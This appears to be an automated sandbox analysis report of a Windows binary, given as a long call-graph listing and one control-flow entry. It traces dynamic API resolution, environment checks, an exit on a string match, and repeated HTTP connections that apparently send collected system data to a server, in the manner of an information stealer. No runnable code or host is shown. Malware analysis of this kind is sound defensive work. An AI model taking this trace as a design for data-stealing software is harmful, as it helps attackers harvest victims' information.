
14282 ee45c0 2 API calls 14281->14282 14283 ee38de 14282->14283 14284 ee45c0 2 API calls 14283->14284 14285 ee38f7 14284->14285 14286 ee45c0 2 API calls 14285->14286 14287 ee3910 14286->14287 14288 ee45c0 2 API calls 14287->14288 14289 ee3929 14288->14289 14290 ee45c0 2 API calls 14289->14290 14291 ee3942 14290->14291 14292 ee45c0 2 API calls 14291->14292 14293 ee395b 14292->14293 14294 ee45c0 2 API calls 14293->14294 14295 ee3974 14294->14295 14296 ee45c0 2 API calls 14295->14296 14297 ee398d 14296->14297 14298 ee45c0 2 API calls 14297->14298 14299 ee39a6 14298->14299 14300 ee45c0 2 API calls 14299->14300 14301 ee39bf 14300->14301 14302 ee45c0 2 API calls 14301->14302 14303 ee39d8 14302->14303 14304 ee45c0 2 API calls 14303->14304 14305 ee39f1 14304->14305 14306 ee45c0 2 API calls 14305->14306 14307 ee3a0a 14306->14307 14308 ee45c0 2 API calls 14307->14308 14309 ee3a23 14308->14309 14310 ee45c0 2 API calls 14309->14310 14311 ee3a3c 14310->14311 14312 ee45c0 2 API calls 14311->14312 14313 ee3a55 14312->14313 14314 ee45c0 2 API calls 14313->14314 14315 ee3a6e 14314->14315 14316 ee45c0 2 API calls 14315->14316 14317 ee3a87 14316->14317 14318 ee45c0 2 API calls 14317->14318 14319 ee3aa0 14318->14319 14320 ee45c0 2 API calls 14319->14320 14321 ee3ab9 14320->14321 14322 ee45c0 2 API calls 14321->14322 14323 ee3ad2 14322->14323 14324 ee45c0 2 API calls 14323->14324 14325 ee3aeb 14324->14325 14326 ee45c0 2 API calls 14325->14326 14327 ee3b04 14326->14327 14328 ee45c0 2 API calls 14327->14328 14329 ee3b1d 14328->14329 14330 ee45c0 2 API calls 14329->14330 14331 ee3b36 14330->14331 14332 ee45c0 2 API calls 14331->14332 14333 ee3b4f 14332->14333 14334 ee45c0 2 API calls 14333->14334 14335 ee3b68 14334->14335 14336 ee45c0 2 API calls 14335->14336 14337 ee3b81 14336->14337 14338 ee45c0 2 API calls 14337->14338 14339 ee3b9a 14338->14339 14340 ee45c0 2 API calls 14339->14340 14341 ee3bb3 14340->14341 14342 ee45c0 2 API calls 14341->14342 14343 ee3bcc 14342->14343 14344 ee45c0 2 
API calls 14343->14344 14345 ee3be5 14344->14345 14346 ee45c0 2 API calls 14345->14346 14347 ee3bfe 14346->14347 14348 ee45c0 2 API calls 14347->14348 14349 ee3c17 14348->14349 14350 ee45c0 2 API calls 14349->14350 14351 ee3c30 14350->14351 14352 ee45c0 2 API calls 14351->14352 14353 ee3c49 14352->14353 14354 ee45c0 2 API calls 14353->14354 14355 ee3c62 14354->14355 14356 ee45c0 2 API calls 14355->14356 14357 ee3c7b 14356->14357 14358 ee45c0 2 API calls 14357->14358 14359 ee3c94 14358->14359 14360 ee45c0 2 API calls 14359->14360 14361 ee3cad 14360->14361 14362 ee45c0 2 API calls 14361->14362 14363 ee3cc6 14362->14363 14364 ee45c0 2 API calls 14363->14364 14365 ee3cdf 14364->14365 14366 ee45c0 2 API calls 14365->14366 14367 ee3cf8 14366->14367 14368 ee45c0 2 API calls 14367->14368 14369 ee3d11 14368->14369 14370 ee45c0 2 API calls 14369->14370 14371 ee3d2a 14370->14371 14372 ee45c0 2 API calls 14371->14372 14373 ee3d43 14372->14373 14374 ee45c0 2 API calls 14373->14374 14375 ee3d5c 14374->14375 14376 ee45c0 2 API calls 14375->14376 14377 ee3d75 14376->14377 14378 ee45c0 2 API calls 14377->14378 14379 ee3d8e 14378->14379 14380 ee45c0 2 API calls 14379->14380 14381 ee3da7 14380->14381 14382 ee45c0 2 API calls 14381->14382 14383 ee3dc0 14382->14383 14384 ee45c0 2 API calls 14383->14384 14385 ee3dd9 14384->14385 14386 ee45c0 2 API calls 14385->14386 14387 ee3df2 14386->14387 14388 ee45c0 2 API calls 14387->14388 14389 ee3e0b 14388->14389 14390 ee45c0 2 API calls 14389->14390 14391 ee3e24 14390->14391 14392 ee45c0 2 API calls 14391->14392 14393 ee3e3d 14392->14393 14394 ee45c0 2 API calls 14393->14394 14395 ee3e56 14394->14395 14396 ee45c0 2 API calls 14395->14396 14397 ee3e6f 14396->14397 14398 ee45c0 2 API calls 14397->14398 14399 ee3e88 14398->14399 14400 ee45c0 2 API calls 14399->14400 14401 ee3ea1 14400->14401 14402 ee45c0 2 API calls 14401->14402 14403 ee3eba 14402->14403 14404 ee45c0 2 API calls 14403->14404 14405 ee3ed3 14404->14405 14406 ee45c0 2 API calls 
14405->14406 14407 ee3eec 14406->14407 14408 ee45c0 2 API calls 14407->14408 14409 ee3f05 14408->14409 14410 ee45c0 2 API calls 14409->14410 14411 ee3f1e 14410->14411 14412 ee45c0 2 API calls 14411->14412 14413 ee3f37 14412->14413 14414 ee45c0 2 API calls 14413->14414 14415 ee3f50 14414->14415 14416 ee45c0 2 API calls 14415->14416 14417 ee3f69 14416->14417 14418 ee45c0 2 API calls 14417->14418 14419 ee3f82 14418->14419 14420 ee45c0 2 API calls 14419->14420 14421 ee3f9b 14420->14421 14422 ee45c0 2 API calls 14421->14422 14423 ee3fb4 14422->14423 14424 ee45c0 2 API calls 14423->14424 14425 ee3fcd 14424->14425 14426 ee45c0 2 API calls 14425->14426 14427 ee3fe6 14426->14427 14428 ee45c0 2 API calls 14427->14428 14429 ee3fff 14428->14429 14430 ee45c0 2 API calls 14429->14430 14431 ee4018 14430->14431 14432 ee45c0 2 API calls 14431->14432 14433 ee4031 14432->14433 14434 ee45c0 2 API calls 14433->14434 14435 ee404a 14434->14435 14436 ee45c0 2 API calls 14435->14436 14437 ee4063 14436->14437 14438 ee45c0 2 API calls 14437->14438 14439 ee407c 14438->14439 14440 ee45c0 2 API calls 14439->14440 14441 ee4095 14440->14441 14442 ee45c0 2 API calls 14441->14442 14443 ee40ae 14442->14443 14444 ee45c0 2 API calls 14443->14444 14445 ee40c7 14444->14445 14446 ee45c0 2 API calls 14445->14446 14447 ee40e0 14446->14447 14448 ee45c0 2 API calls 14447->14448 14449 ee40f9 14448->14449 14450 ee45c0 2 API calls 14449->14450 14451 ee4112 14450->14451 14452 ee45c0 2 API calls 14451->14452 14453 ee412b 14452->14453 14454 ee45c0 2 API calls 14453->14454 14455 ee4144 14454->14455 14456 ee45c0 2 API calls 14455->14456 14457 ee415d 14456->14457 14458 ee45c0 2 API calls 14457->14458 14459 ee4176 14458->14459 14460 ee45c0 2 API calls 14459->14460 14461 ee418f 14460->14461 14462 ee45c0 2 API calls 14461->14462 14463 ee41a8 14462->14463 14464 ee45c0 2 API calls 14463->14464 14465 ee41c1 14464->14465 14466 ee45c0 2 API calls 14465->14466 14467 ee41da 14466->14467 14468 ee45c0 2 API calls 14467->14468 
14469 ee41f3 14468->14469 14470 ee45c0 2 API calls 14469->14470 14471 ee420c 14470->14471 14472 ee45c0 2 API calls 14471->14472 14473 ee4225 14472->14473 14474 ee45c0 2 API calls 14473->14474 14475 ee423e 14474->14475 14476 ee45c0 2 API calls 14475->14476 14477 ee4257 14476->14477 14478 ee45c0 2 API calls 14477->14478 14479 ee4270 14478->14479 14480 ee45c0 2 API calls 14479->14480 14481 ee4289 14480->14481 14482 ee45c0 2 API calls 14481->14482 14483 ee42a2 14482->14483 14484 ee45c0 2 API calls 14483->14484 14485 ee42bb 14484->14485 14486 ee45c0 2 API calls 14485->14486 14487 ee42d4 14486->14487 14488 ee45c0 2 API calls 14487->14488 14489 ee42ed 14488->14489 14490 ee45c0 2 API calls 14489->14490 14491 ee4306 14490->14491 14492 ee45c0 2 API calls 14491->14492 14493 ee431f 14492->14493 14494 ee45c0 2 API calls 14493->14494 14495 ee4338 14494->14495 14496 ee45c0 2 API calls 14495->14496 14497 ee4351 14496->14497 14498 ee45c0 2 API calls 14497->14498 14499 ee436a 14498->14499 14500 ee45c0 2 API calls 14499->14500 14501 ee4383 14500->14501 14502 ee45c0 2 API calls 14501->14502 14503 ee439c 14502->14503 14504 ee45c0 2 API calls 14503->14504 14505 ee43b5 14504->14505 14506 ee45c0 2 API calls 14505->14506 14507 ee43ce 14506->14507 14508 ee45c0 2 API calls 14507->14508 14509 ee43e7 14508->14509 14510 ee45c0 2 API calls 14509->14510 14511 ee4400 14510->14511 14512 ee45c0 2 API calls 14511->14512 14513 ee4419 14512->14513 14514 ee45c0 2 API calls 14513->14514 14515 ee4432 14514->14515 14516 ee45c0 2 API calls 14515->14516 14517 ee444b 14516->14517 14518 ee45c0 2 API calls 14517->14518 14519 ee4464 14518->14519 14520 ee45c0 2 API calls 14519->14520 14521 ee447d 14520->14521 14522 ee45c0 2 API calls 14521->14522 14523 ee4496 14522->14523 14524 ee45c0 2 API calls 14523->14524 14525 ee44af 14524->14525 14526 ee45c0 2 API calls 14525->14526 14527 ee44c8 14526->14527 14528 ee45c0 2 API calls 14527->14528 14529 ee44e1 14528->14529 14530 ee45c0 2 API calls 14529->14530 14531 ee44fa 
14530->14531 14532 ee45c0 2 API calls 14531->14532 14533 ee4513 14532->14533 14534 ee45c0 2 API calls 14533->14534 14535 ee452c 14534->14535 14536 ee45c0 2 API calls 14535->14536 14537 ee4545 14536->14537 14538 ee45c0 2 API calls 14537->14538 14539 ee455e 14538->14539 14540 ee45c0 2 API calls 14539->14540 14541 ee4577 14540->14541 14542 ee45c0 2 API calls 14541->14542 14543 ee4590 14542->14543 14544 ee45c0 2 API calls 14543->14544 14545 ee45a9 14544->14545 14546 ef9c10 14545->14546 14547 efa036 8 API calls 14546->14547 14548 ef9c20 43 API calls 14546->14548 14549 efa0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14547->14549 14550 efa146 14547->14550 14548->14547 14549->14550 14551 efa216 14550->14551 14552 efa153 8 API calls 14550->14552 14553 efa21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14551->14553 14554 efa298 14551->14554 14552->14551 14553->14554 14555 efa337 14554->14555 14556 efa2a5 6 API calls 14554->14556 14557 efa41f 14555->14557 14558 efa344 9 API calls 14555->14558 14556->14555 14559 efa428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14557->14559 14560 efa4a2 14557->14560 14558->14557 14559->14560 14561 efa4dc 14560->14561 14562 efa4ab GetProcAddress GetProcAddress 14560->14562 14563 efa515 14561->14563 14564 efa4e5 GetProcAddress GetProcAddress 14561->14564 14562->14561 14565 efa612 14563->14565 14566 efa522 10 API calls 14563->14566 14564->14563 14567 efa67d 14565->14567 14568 efa61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14565->14568 14566->14565 14569 efa69e 14567->14569 14570 efa686 GetProcAddress 14567->14570 14568->14567 14571 ef5ca3 14569->14571 14572 efa6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14569->14572 14570->14569 14573 ee1590 14571->14573 14572->14571 15694 ee1670 14573->15694 14576 efa7a0 lstrcpy 14577 ee15b5 14576->14577 14578 efa7a0 lstrcpy 14577->14578 14579 ee15c7 14578->14579 14580 efa7a0 
lstrcpy 14579->14580 14581 ee15d9 14580->14581 14582 efa7a0 lstrcpy 14581->14582 14583 ee1663 14582->14583 14584 ef5510 14583->14584 14585 ef5521 14584->14585 14586 efa820 2 API calls 14585->14586 14587 ef552e 14586->14587 14588 efa820 2 API calls 14587->14588 14589 ef553b 14588->14589 14590 efa820 2 API calls 14589->14590 14591 ef5548 14590->14591 14592 efa740 lstrcpy 14591->14592 14593 ef5555 14592->14593 14594 efa740 lstrcpy 14593->14594 14595 ef5562 14594->14595 14596 efa740 lstrcpy 14595->14596 14597 ef556f 14596->14597 14598 efa740 lstrcpy 14597->14598 14638 ef557c 14598->14638 14599 efa7a0 lstrcpy 14599->14638 14600 ef5643 StrCmpCA 14600->14638 14601 ef56a0 StrCmpCA 14602 ef57dc 14601->14602 14601->14638 14603 efa8a0 lstrcpy 14602->14603 14605 ef57e8 14603->14605 14604 ee1590 lstrcpy 14604->14638 14606 efa820 2 API calls 14605->14606 14607 ef57f6 14606->14607 14609 efa820 2 API calls 14607->14609 14608 ef5856 StrCmpCA 14610 ef5991 14608->14610 14608->14638 14613 ef5805 14609->14613 14612 efa8a0 lstrcpy 14610->14612 14611 efa740 lstrcpy 14611->14638 14614 ef599d 14612->14614 14615 ee1670 lstrcpy 14613->14615 14617 efa820 2 API calls 14614->14617 14635 ef5811 14615->14635 14616 efa820 lstrlen lstrcpy 14616->14638 14618 ef59ab 14617->14618 14620 efa820 2 API calls 14618->14620 14619 ef5a0b StrCmpCA 14621 ef5a28 14619->14621 14622 ef5a16 Sleep 14619->14622 14625 ef59ba 14620->14625 14623 efa8a0 lstrcpy 14621->14623 14622->14638 14626 ef5a34 14623->14626 14624 efa8a0 lstrcpy 14624->14638 14627 ee1670 lstrcpy 14625->14627 14628 efa820 2 API calls 14626->14628 14627->14635 14629 ef5a43 14628->14629 14631 efa820 2 API calls 14629->14631 14630 ef52c0 25 API calls 14630->14638 14632 ef5a52 14631->14632 14634 ee1670 lstrcpy 14632->14634 14633 ef578a StrCmpCA 14633->14638 14634->14635 14635->13691 14636 ef593f StrCmpCA 14636->14638 14637 ef51f0 20 API calls 14637->14638 14638->14599 14638->14600 14638->14601 14638->14604 14638->14608 14638->14611 14638->14616 
14638->14619 14638->14624 14638->14630 14638->14633 14638->14636 14638->14637 14640 ef754c 14639->14640 14641 ef7553 GetVolumeInformationA 14639->14641 14640->14641 14643 ef7591 14641->14643 14642 ef75fc GetProcessHeap RtlAllocateHeap 14644 ef7619 14642->14644 14645 ef7628 wsprintfA 14642->14645 14643->14642 14646 efa740 lstrcpy 14644->14646 14647 efa740 lstrcpy 14645->14647 14648 ef5da7 14646->14648 14647->14648 14648->13712 14650 efa7a0 lstrcpy 14649->14650 14651 ee4899 14650->14651 15703 ee47b0 14651->15703 14653 ee48a5 14654 efa740 lstrcpy 14653->14654 14655 ee48d7 14654->14655 14656 efa740 lstrcpy 14655->14656 14657 ee48e4 14656->14657 14658 efa740 lstrcpy 14657->14658 14659 ee48f1 14658->14659 14660 efa740 lstrcpy 14659->14660 14661 ee48fe 14660->14661 14662 efa740 lstrcpy 14661->14662 14663 ee490b InternetOpenA StrCmpCA 14662->14663 14664 ee4944 14663->14664 14665 ee4ecb InternetCloseHandle 14664->14665 15709 ef8b60 14664->15709 14667 ee4ee8 14665->14667 15724 ee9ac0 CryptStringToBinaryA 14667->15724 14668 ee4963 15717 efa920 14668->15717 14671 ee4976 14673 efa8a0 lstrcpy 14671->14673 14678 ee497f 14673->14678 14674 efa820 2 API calls 14675 ee4f05 14674->14675 14677 efa9b0 4 API calls 14675->14677 14676 ee4f27 codecvt 14680 efa7a0 lstrcpy 14676->14680 14679 ee4f1b 14677->14679 14682 efa9b0 4 API calls 14678->14682 14681 efa8a0 lstrcpy 14679->14681 14693 ee4f57 14680->14693 14681->14676 14683 ee49a9 14682->14683 14684 efa8a0 lstrcpy 14683->14684 14685 ee49b2 14684->14685 14686 efa9b0 4 API calls 14685->14686 14687 ee49d1 14686->14687 14688 efa8a0 lstrcpy 14687->14688 14689 ee49da 14688->14689 14690 efa920 3 API calls 14689->14690 14691 ee49f8 14690->14691 14692 efa8a0 lstrcpy 14691->14692 14694 ee4a01 14692->14694 14693->13715 14695 efa9b0 4 API calls 14694->14695 14696 ee4a20 14695->14696 14697 efa8a0 lstrcpy 14696->14697 14698 ee4a29 14697->14698 14699 efa9b0 4 API calls 14698->14699 14700 ee4a48 14699->14700 14701 efa8a0 lstrcpy 14700->14701 14702 ee4a51 
14701->14702 14703 efa9b0 4 API calls 14702->14703 14704 ee4a7d 14703->14704 14705 efa920 3 API calls 14704->14705 14706 ee4a84 14705->14706 14707 efa8a0 lstrcpy 14706->14707 14708 ee4a8d 14707->14708 14709 ee4aa3 InternetConnectA 14708->14709 14709->14665 14710 ee4ad3 HttpOpenRequestA 14709->14710 14712 ee4ebe InternetCloseHandle 14710->14712 14713 ee4b28 14710->14713 14712->14665 14714 efa9b0 4 API calls 14713->14714 14715 ee4b3c 14714->14715 14716 efa8a0 lstrcpy 14715->14716 14717 ee4b45 14716->14717 14718 efa920 3 API calls 14717->14718 14719 ee4b63 14718->14719 14720 efa8a0 lstrcpy 14719->14720 14721 ee4b6c 14720->14721 14722 efa9b0 4 API calls 14721->14722 14723 ee4b8b 14722->14723 14724 efa8a0 lstrcpy 14723->14724 14725 ee4b94 14724->14725 14726 efa9b0 4 API calls 14725->14726 14727 ee4bb5 14726->14727 14728 efa8a0 lstrcpy 14727->14728 14729 ee4bbe 14728->14729 14730 efa9b0 4 API calls 14729->14730 14731 ee4bde 14730->14731 14732 efa8a0 lstrcpy 14731->14732 14733 ee4be7 14732->14733 14734 efa9b0 4 API calls 14733->14734 14735 ee4c06 14734->14735 14736 efa8a0 lstrcpy 14735->14736 14737 ee4c0f 14736->14737 14738 efa920 3 API calls 14737->14738 14739 ee4c2d 14738->14739 14740 efa8a0 lstrcpy 14739->14740 14741 ee4c36 14740->14741 14742 efa9b0 4 API calls 14741->14742 14743 ee4c55 14742->14743 14744 efa8a0 lstrcpy 14743->14744 14745 ee4c5e 14744->14745 14746 efa9b0 4 API calls 14745->14746 14747 ee4c7d 14746->14747 14748 efa8a0 lstrcpy 14747->14748 14749 ee4c86 14748->14749 14750 efa920 3 API calls 14749->14750 14751 ee4ca4 14750->14751 14752 efa8a0 lstrcpy 14751->14752 14753 ee4cad 14752->14753 14754 efa9b0 4 API calls 14753->14754 14755 ee4ccc 14754->14755 14756 efa8a0 lstrcpy 14755->14756 14757 ee4cd5 14756->14757 14758 efa9b0 4 API calls 14757->14758 14759 ee4cf6 14758->14759 14760 efa8a0 lstrcpy 14759->14760 14761 ee4cff 14760->14761 14762 efa9b0 4 API calls 14761->14762 14763 ee4d1f 14762->14763 14764 efa8a0 lstrcpy 14763->14764 14765 ee4d28 14764->14765 
14766 efa9b0 4 API calls 14765->14766 14767 ee4d47 14766->14767 14768 efa8a0 lstrcpy 14767->14768 14769 ee4d50 14768->14769 14770 efa920 3 API calls 14769->14770 14771 ee4d6e 14770->14771 14772 efa8a0 lstrcpy 14771->14772 14773 ee4d77 14772->14773 14774 efa740 lstrcpy 14773->14774 14775 ee4d92 14774->14775 14776 efa920 3 API calls 14775->14776 14777 ee4db3 14776->14777 14778 efa920 3 API calls 14777->14778 14779 ee4dba 14778->14779 14780 efa8a0 lstrcpy 14779->14780 14781 ee4dc6 14780->14781 14782 ee4de7 lstrlen 14781->14782 14783 ee4dfa 14782->14783 14784 ee4e03 lstrlen 14783->14784 15723 efaad0 14784->15723 14786 ee4e13 HttpSendRequestA 14787 ee4e32 InternetReadFile 14786->14787 14788 ee4e67 InternetCloseHandle 14787->14788 14793 ee4e5e 14787->14793 14790 efa800 14788->14790 14790->14712 14791 efa9b0 4 API calls 14791->14793 14792 efa8a0 lstrcpy 14792->14793 14793->14787 14793->14788 14793->14791 14793->14792 15730 efaad0 14794->15730 14796 ef17c4 StrCmpCA 14797 ef17cf ExitProcess 14796->14797 14798 ef17d7 14796->14798 14799 ef19c2 14798->14799 14800 ef18cf StrCmpCA 14798->14800 14801 ef18ad StrCmpCA 14798->14801 14802 ef187f StrCmpCA 14798->14802 14803 ef185d StrCmpCA 14798->14803 14804 ef1913 StrCmpCA 14798->14804 14805 ef1932 StrCmpCA 14798->14805 14806 ef18f1 StrCmpCA 14798->14806 14807 ef1951 StrCmpCA 14798->14807 14808 ef1970 StrCmpCA 14798->14808 14809 efa820 lstrlen lstrcpy 14798->14809 14799->13717 14800->14798 14801->14798 14802->14798 14803->14798 14804->14798 14805->14798 14806->14798 14807->14798 14808->14798 14809->14798 14811 efa7a0 lstrcpy 14810->14811 14812 ee5979 14811->14812 14813 ee47b0 2 API calls 14812->14813 14814 ee5985 14813->14814 14815 efa740 lstrcpy 14814->14815 14816 ee59ba 14815->14816 14817 efa740 lstrcpy 14816->14817 14818 ee59c7 14817->14818 14819 efa740 lstrcpy 14818->14819 14820 ee59d4 14819->14820 14821 efa740 lstrcpy 14820->14821 14822 ee59e1 14821->14822 14823 efa740 lstrcpy 14822->14823 14824 ee59ee InternetOpenA StrCmpCA 
14823->14824 14825 ee5a1d 14824->14825 14826 ee5fc3 InternetCloseHandle 14825->14826 14827 ef8b60 3 API calls 14825->14827 14828 ee5fe0 14826->14828 14829 ee5a3c 14827->14829 14831 ee9ac0 4 API calls 14828->14831 14830 efa920 3 API calls 14829->14830 14832 ee5a4f 14830->14832 14833 ee5fe6 14831->14833 14834 efa8a0 lstrcpy 14832->14834 14835 efa820 2 API calls 14833->14835 14837 ee601f codecvt 14833->14837 14839 ee5a58 14834->14839 14836 ee5ffd 14835->14836 14838 efa9b0 4 API calls 14836->14838 14841 efa7a0 lstrcpy 14837->14841 14840 ee6013 14838->14840 14843 efa9b0 4 API calls 14839->14843 14842 efa8a0 lstrcpy 14840->14842 14851 ee604f 14841->14851 14842->14837 14844 ee5a82 14843->14844 14845 efa8a0 lstrcpy 14844->14845 14846 ee5a8b 14845->14846 14847 efa9b0 4 API calls 14846->14847 14848 ee5aaa 14847->14848 14849 efa8a0 lstrcpy 14848->14849 14850 ee5ab3 14849->14850 14852 efa920 3 API calls 14850->14852 14851->13723 14853 ee5ad1 14852->14853 14854 efa8a0 lstrcpy 14853->14854 14855 ee5ada 14854->14855 14856 efa9b0 4 API calls 14855->14856 14857 ee5af9 14856->14857 14858 efa8a0 lstrcpy 14857->14858 14859 ee5b02 14858->14859 14860 efa9b0 4 API calls 14859->14860 14861 ee5b21 14860->14861 14862 efa8a0 lstrcpy 14861->14862 14863 ee5b2a 14862->14863 14864 efa9b0 4 API calls 14863->14864 14865 ee5b56 14864->14865 14866 efa920 3 API calls 14865->14866 14867 ee5b5d 14866->14867 14868 efa8a0 lstrcpy 14867->14868 14869 ee5b66 14868->14869 14870 ee5b7c InternetConnectA 14869->14870 14870->14826 14871 ee5bac HttpOpenRequestA 14870->14871 14873 ee5c0b 14871->14873 14874 ee5fb6 InternetCloseHandle 14871->14874 14875 efa9b0 4 API calls 14873->14875 14874->14826 14876 ee5c1f 14875->14876 14877 efa8a0 lstrcpy 14876->14877 14878 ee5c28 14877->14878 14879 efa920 3 API calls 14878->14879 14880 ee5c46 14879->14880 14881 efa8a0 lstrcpy 14880->14881 14882 ee5c4f 14881->14882 14883 efa9b0 4 API calls 14882->14883 14884 ee5c6e 14883->14884 14885 efa8a0 lstrcpy 14884->14885 14886 ee5c77 
14885->14886 14887 efa9b0 4 API calls 14886->14887 14888 ee5c98 14887->14888 14889 efa8a0 lstrcpy 14888->14889 14890 ee5ca1 14889->14890 14891 efa9b0 4 API calls 14890->14891 14892 ee5cc1 14891->14892 14893 efa8a0 lstrcpy 14892->14893 14894 ee5cca 14893->14894 14895 efa9b0 4 API calls 14894->14895 14896 ee5ce9 14895->14896 14897 efa8a0 lstrcpy 14896->14897 14898 ee5cf2 14897->14898 14899 efa920 3 API calls 14898->14899 14900 ee5d10 14899->14900 14901 efa8a0 lstrcpy 14900->14901 14902 ee5d19 14901->14902 14903 efa9b0 4 API calls 14902->14903 14904 ee5d38 14903->14904 14905 efa8a0 lstrcpy 14904->14905 14906 ee5d41 14905->14906 14907 efa9b0 4 API calls 14906->14907 14908 ee5d60 14907->14908 14909 efa8a0 lstrcpy 14908->14909 14910 ee5d69 14909->14910 14911 efa920 3 API calls 14910->14911 14912 ee5d87 14911->14912 14913 efa8a0 lstrcpy 14912->14913 14914 ee5d90 14913->14914 14915 efa9b0 4 API calls 14914->14915 14916 ee5daf 14915->14916 14917 efa8a0 lstrcpy 14916->14917 14918 ee5db8 14917->14918 14919 efa9b0 4 API calls 14918->14919 14920 ee5dd9 14919->14920 14921 efa8a0 lstrcpy 14920->14921 14922 ee5de2 14921->14922 14923 efa9b0 4 API calls 14922->14923 14924 ee5e02 14923->14924 14925 efa8a0 lstrcpy 14924->14925 14926 ee5e0b 14925->14926 14927 efa9b0 4 API calls 14926->14927 14928 ee5e2a 14927->14928 14929 efa8a0 lstrcpy 14928->14929 14930 ee5e33 14929->14930 14931 efa920 3 API calls 14930->14931 14932 ee5e54 14931->14932 14933 efa8a0 lstrcpy 14932->14933 14934 ee5e5d 14933->14934 14935 ee5e70 lstrlen 14934->14935 15731 efaad0 14935->15731 14937 ee5e81 lstrlen GetProcessHeap RtlAllocateHeap 15732 efaad0 14937->15732 14939 ee5eae lstrlen 14940 ee5ebe 14939->14940 14941 ee5ed7 lstrlen 14940->14941 14942 ee5ee7 14941->14942 14943 ee5ef0 lstrlen 14942->14943 14944 ee5f03 14943->14944 14945 ee5f1a lstrlen 14944->14945 15733 efaad0 14945->15733 14947 ee5f2a HttpSendRequestA 14948 ee5f35 InternetReadFile 14947->14948 14949 ee5f6a InternetCloseHandle 14948->14949 14953 ee5f61 
14948->14953 14949->14874 14951 efa9b0 4 API calls 14951->14953 14952 efa8a0 lstrcpy 14952->14953 14953->14948 14953->14949 14953->14951 14953->14952 14955 ef1077 14954->14955 14956 ef1151 14955->14956 14957 efa820 lstrlen lstrcpy 14955->14957 14956->13725 14957->14955 14959 ef0db7 14958->14959 14960 ef0f17 14959->14960 14961 ef0e27 StrCmpCA 14959->14961 14962 ef0e67 StrCmpCA 14959->14962 14963 ef0ea4 StrCmpCA 14959->14963 14964 efa820 lstrlen lstrcpy 14959->14964 14960->13733 14961->14959 14962->14959 14963->14959 14964->14959 14968 ef0f67 14965->14968 14966 ef1044 14966->13741 14967 ef0fb2 StrCmpCA 14967->14968 14968->14966 14968->14967 14969 efa820 lstrlen lstrcpy 14968->14969 14969->14968 14971 efa740 lstrcpy 14970->14971 14972 ef1a26 14971->14972 14973 efa9b0 4 API calls 14972->14973 14974 ef1a37 14973->14974 14975 efa8a0 lstrcpy 14974->14975 14976 ef1a40 14975->14976 14977 efa9b0 4 API calls 14976->14977 14978 ef1a5b 14977->14978 14979 efa8a0 lstrcpy 14978->14979 14980 ef1a64 14979->14980 14981 efa9b0 4 API calls 14980->14981 14982 ef1a7d 14981->14982 14983 efa8a0 lstrcpy 14982->14983 14984 ef1a86 14983->14984 14985 efa9b0 4 API calls 14984->14985 14986 ef1aa1 14985->14986 14987 efa8a0 lstrcpy 14986->14987 14988 ef1aaa 14987->14988 14989 efa9b0 4 API calls 14988->14989 14990 ef1ac3 14989->14990 14991 efa8a0 lstrcpy 14990->14991 14992 ef1acc 14991->14992 14993 efa9b0 4 API calls 14992->14993 14994 ef1ae7 14993->14994 14995 efa8a0 lstrcpy 14994->14995 14996 ef1af0 14995->14996 14997 efa9b0 4 API calls 14996->14997 14998 ef1b09 14997->14998 14999 efa8a0 lstrcpy 14998->14999 15000 ef1b12 14999->15000 15001 efa9b0 4 API calls 15000->15001 15002 ef1b2d 15001->15002 15003 efa8a0 lstrcpy 15002->15003 15004 ef1b36 15003->15004 15005 efa9b0 4 API calls 15004->15005 15006 ef1b4f 15005->15006 15007 efa8a0 lstrcpy 15006->15007 15008 ef1b58 15007->15008 15009 efa9b0 4 API calls 15008->15009 15010 ef1b76 15009->15010 15011 efa8a0 lstrcpy 15010->15011 15012 ef1b7f 
15011->15012 15013 ef7500 6 API calls 15012->15013 15014 ef1b96 15013->15014 15015 efa920 3 API calls 15014->15015 15016 ef1ba9 15015->15016 15017 efa8a0 lstrcpy 15016->15017 15018 ef1bb2 15017->15018 15019 efa9b0 4 API calls 15018->15019 15020 ef1bdc 15019->15020 15021 efa8a0 lstrcpy 15020->15021 15022 ef1be5 15021->15022 15023 efa9b0 4 API calls 15022->15023 15024 ef1c05 15023->15024 15025 efa8a0 lstrcpy 15024->15025 15026 ef1c0e 15025->15026 15734 ef7690 GetProcessHeap RtlAllocateHeap 15026->15734 15029 efa9b0 4 API calls 15030 ef1c2e 15029->15030 15031 efa8a0 lstrcpy 15030->15031 15032 ef1c37 15031->15032 15033 efa9b0 4 API calls 15032->15033 15034 ef1c56 15033->15034 15035 efa8a0 lstrcpy 15034->15035 15036 ef1c5f 15035->15036 15037 efa9b0 4 API calls 15036->15037 15038 ef1c80 15037->15038 15039 efa8a0 lstrcpy 15038->15039 15040 ef1c89 15039->15040 15741 ef77c0 GetCurrentProcess IsWow64Process 15040->15741 15043 efa9b0 4 API calls 15044 ef1ca9 15043->15044 15045 efa8a0 lstrcpy 15044->15045 15046 ef1cb2 15045->15046 15047 efa9b0 4 API calls 15046->15047 15048 ef1cd1 15047->15048 15049 efa8a0 lstrcpy 15048->15049 15050 ef1cda 15049->15050 15051 efa9b0 4 API calls 15050->15051 15052 ef1cfb 15051->15052 15053 efa8a0 lstrcpy 15052->15053 15054 ef1d04 15053->15054 15055 ef7850 3 API calls 15054->15055 15056 ef1d14 15055->15056 15057 efa9b0 4 API calls 15056->15057 15058 ef1d24 15057->15058 15059 efa8a0 lstrcpy 15058->15059 15060 ef1d2d 15059->15060 15061 efa9b0 4 API calls 15060->15061 15062 ef1d4c 15061->15062 15063 efa8a0 lstrcpy 15062->15063 15064 ef1d55 15063->15064 15065 efa9b0 4 API calls 15064->15065 15066 ef1d75 15065->15066 15067 efa8a0 lstrcpy 15066->15067 15068 ef1d7e 15067->15068 15069 ef78e0 3 API calls 15068->15069 15070 ef1d8e 15069->15070 15071 efa9b0 4 API calls 15070->15071 15072 ef1d9e 15071->15072 15073 efa8a0 lstrcpy 15072->15073 15074 ef1da7 15073->15074 15075 efa9b0 4 API calls 15074->15075 15076 ef1dc6 15075->15076 15077 efa8a0 lstrcpy 

                      Control-flow Graph: function ef9860-ef9bc2 (calls ef9750 and ef9780, then GetProcAddress and LoadLibraryA; graph image not reproduced here)
                      APIs
                      • GetProcAddress.KERNEL32(76F70000,016807C8), ref: 00EF98A1
                      • GetProcAddress.KERNEL32(76F70000,01680798), ref: 00EF98BA
